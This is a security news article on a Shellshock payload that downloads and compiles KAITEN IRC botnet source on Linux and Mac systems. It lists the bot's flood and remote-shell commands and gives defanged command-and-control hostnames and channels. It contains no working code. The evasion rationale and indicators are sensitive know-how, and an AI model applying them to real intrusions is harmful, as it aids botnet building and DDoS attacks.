A Bash bug payload downloads the KAITEN source code, which is compiled using the gcc compiler and ultimately builds an executable file.
A Bash bug payload downloads the KAITEN source code, which is compiled using the gcc compiler and ultimately builds an executable file.

Attackers have been leveraging Shellshock vulnerabilities to deliver malware since the issue was disclosed in late September, and now researchers with Trend Micro have observed a Bash bug payload – detected as TROJ_BASHKAI.SM – downloading the source code of KAITEN malware.

KAITEN is an older Internet Relay Chat (IRC)-controlled malware that is typically used to carry out distributed denial-of-service (DDoS) attacks, so spreading the infection can help the attackers bring down targeted organizations, according to a Sunday Trend Micro post.

“The purpose is to add compromised systems to botnets,” Christopher Budd, global threat communications manager with Trend Micro, told SCMagazine.com in a Monday email correspondence. “In this case these are botnets primarily focused on launching DDoS attacks.”

Getting KAITEN on the system – Linux/UNIX and Mac OS X systems are at risk, Budd said – is not a direct process.

TROJ_BASHKAI.SM connects to two URLs when executed, according to the post. The first URL downloads the KAITEN source code, which is compiled using the gcc compiler and ultimately builds an executable file detected as ELF_KAITEN.SM.

Compiling ensures proper execution of the malware because, if downloaded directly as an executable, the file runs the risk of having compatibility issues with different Linux OS distributions, the post indicates. Furthermore, the file will evade network security systems that only scan for executables.

ELF_KAITEN.SM connects to an IRC server at x[dot]secureshellz[dot]net, joins IRC channel #pwn, and awaits commands, according to the post. Some commands include perform UDP flood, perform SYN flood, download files, send raw IRC command, start remote shell, perform PUCH-ACK flood, and disable, enable, terminate client.

When TROJ_BASHKAI.SM connects to the second URL, KAITEN source code is downloaded and similarly compiled into ELF_KAITEN.A, which is essentially the same as ELF_KAITEN.SM except that it connects to linksys[dot]secureshellz[dot]net[colon]25 and to channel #shellshock, the post indicates.